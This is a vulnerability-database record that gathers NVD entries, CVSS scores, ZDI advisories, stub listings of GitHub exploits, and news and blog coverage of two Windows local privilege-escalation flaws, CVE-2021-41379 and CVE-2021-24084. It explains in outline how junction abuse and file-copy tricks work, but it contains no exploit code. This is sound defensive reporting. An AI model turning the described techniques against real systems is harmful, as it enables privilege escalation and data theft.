"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-23T10:56:28", "id": "HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:46:25", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-24084", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-03-04T15:34:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2021-24084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:17:12", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "cve", "title": "CVE-2021-41379", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-12T20:17:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-05-01T12:57:33", "description": "<h1 align=\"center\">WindowsMDM-LPE-0Day</h1>\n<i><h3 align=\"center...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-28T09:48:36", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-05-01T12:04:50", "id": "291894F9-38D4-5877-8B8F-EF46C6D23B82", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-10T14:59:52", "description": "# WindowsMDMLPE\n\nDemo : ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-27T00:37:07", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-02-10T13:34:38", "id": "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-20T21:38:55", "description": "# shakeitoff\r\n\r\nA smaller, minimized, and cleaner version of [In...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T19:15:59", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883"], "modified": "2022-03-20T15:46:42", "id": "DF9C9272-7F4D-5362-A6BF-18A60A5E907D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdi": [{"lastseen": "2022-01-31T22:27:52", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Device Management Enrollment Service. By creating a directory junction, an attacker can abuse the Device Management Enrollment Service to disclose the contents of arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Device Management Enrollment Service Directory Junction Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-02-10T00:00:00", "id": "ZDI-21-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-178/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-01-31T22:15:05", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Windows Installer service. By creating a junction, an attacker can abuse the service to delete a file or directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdi", "title": "Microsoft Windows Installer Service Link Following Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-11T00:00:00", "id": "ZDI-21-1308", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-11-26T18:36:46", "description": "Sometimes the ways in which malicious code gets in the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.\n\nA quick summary of the events in the history of this exploit:\n\n * A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on an affected system with elevated privileges.\n * Microsoft patched the vulnerability in November\u2019s Patch Tuesday update.\n * The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft\u2019s bug bounty program.\n * The researcher\u2019s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.\n\nLet&#x27;s have a look at what is going on and how it came to this.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question was listed as [CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>) and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.\n\nBy exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.\n\n### The patch\n\nMicrosoft patched the vulnerability in the [November Patch Tuesday updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>). But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.\n\nWith the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim&#x27;s machine, but now they can run the code with SYSTEM privileges thanks to the exploit.\n\n### The frustration\n\nThe researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the [Trend Micro zero-day initiative](<https://www.zerodayinitiative.com>), that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.\n\nApparently the main reason for his frustration was the reward level.\n\n\u201c\u201cMicrosoft\u2019s rewards have been very bad since April 2020; the community wouldn\u2019t make these kinds of decisions if Microsoft took its rewards seriously.\u201d\n\n### In the wild\n\nSeveral security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quick attackers are able to weaponize publicly available exploit code.\n\n### Mitigation\n\nThe researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn\u2019t seem confident that Microsoft will get it right this time.\n\n&quot;Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again.&quot;\n\nMicrosoft says it is working on it. In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.\n\nMalwarebytes detects and stops the exploit\n\nStay safe, everyone!\n\nThe post [Windows Installer vulnerability becomes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:21:50", "type": "malwarebytes", "title": "Windows Installer vulnerability becomes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-24T14:21:50", "id": "MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn&#x27;t a FCEB agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it&#x27;s added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you&#x27;re looking yourself, you need to click on the arrow on the of the &quot;Date Added to Catalog&quot; column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new at all. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20 year old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). Other products include those by Microsoft (27), Adobe (16), and Oracle(7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?\n\nAccording to Adam Kujawa, Security Evangelist and Director of Malwarebytes&#x27; Threat Intel team:\n\n> &quot;In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of \u201cplayground\u201d for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.\n\n> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.\n\n> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don\u2019t have endpoint patching as their top priority?&quot;\n\n## Mitigation\n\nGiven the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates. Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.\n\nStay safe, everyone!\n\nThe post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-14T11:18:33", "type": "malwarebytes", "title": "CISA list of 95 new known exploited vulnerabilities raises questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0367", "CVE-2014-4114", "CVE-2015-2424", "CVE-2016-4117", "CVE-2016-8562", "CVE-2021-41379"], "modified": "2022-03-14T11:18:33", "id": "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-30T01:39:23", "description": "An unpatched Windows security vulnerability could allow information disclosure and local privilege escalation (LPE), researchers have warned. The issue (CVE-2021-24084) has yet to get an official fix, making it a zero-day bug \u2013 but a micropatch has been rolled out as a stop-gap measure.\n\nSecurity researcher Abdelhamid Naceri [originally reported](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) the vulnerability as an information-disclosure issue in October 2020, via Trend Micro\u2019s Zero-Day Initiative (ZDI). Though Microsoft had told him it was planning a fix for last April, the patch has not yet been forthcoming.\n\nThen, this month, Naceri discovered that CVE-2021-24084 could also be exploited for LPE, so that non-admin Windows users can read arbitrary files even if they do not have permissions to do so. In a proof-of-concept exploit, he demonstrated that it\u2019s possible to copy files from a chosen location into a Cabinet (.CAB) archive that the user can then open and read.\n\n> I mean this is still unpatched and allow LPE if shadow volume copies are enabled; \nBut I noticed that it doesn't work on windows 11 <https://t.co/HJcZ6ew8PO>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 15, 2021](<https://twitter.com/KLINIX5/status/1460338968780804098?ref_src=twsrc%5Etfw>)\n\nThe process for doing so is very similar to the [LPE exploitation approach](<https://www.hackingarticles.in/windows-privilege-escalation-hivenightmare/>) for the HiveNightmare bug, [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)**,** which affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for 